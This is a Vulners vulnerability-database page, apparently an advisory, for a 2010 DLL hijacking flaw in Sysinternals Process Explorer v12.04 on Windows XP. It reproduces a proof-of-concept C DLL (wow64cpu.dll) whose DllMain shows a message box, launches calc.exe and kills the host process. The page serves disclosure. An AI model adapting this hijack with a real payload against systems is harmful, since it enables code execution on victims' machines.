Vulners
Lucene search
Sysinternals Process Explorer DLL Hijack
`/*
* Exploit Title: Sysinternals Process Explorer DLL Hijacking on x86 Windows systems (wow64cpu.dll)
* Date: 27 Aug 2010
* Author: miom
* Software Link: http://technet.microsoft.com/sysinternals/bb896653.aspx
* Version: Process Explorer v12.04
* Tested on: Windows XP SP3 x86
*
* This exploit targets x86 Windows systems that use Sysinternals Process Explorer as their task manager.
* Invoking this program with ctrl+alt+del or ctrl+shift+esc will set the cwd to the user directory (%UserProfile%).
* If you place there this dll it will be loaded since it's missing in the directories with a higher
* loading priority.
*/
#include<windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
static int call_once = 1;
if(call_once){
call_once = 0;
MessageBox(NULL, "Greetings from your hijacked dll.\n"
"We'll run calc.exe instead of your program harhar>)", "Vulnerable!", MB_OK | MB_ICONINFORMATION);
ShellExecute(NULL, "open", "calc.exe", NULL, NULL, SW_SHOWNORMAL);
ExitProcess(0);
}
return TRUE;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Sep 2010 00:00Current
0.6Low risk
Vulners AI Score0.6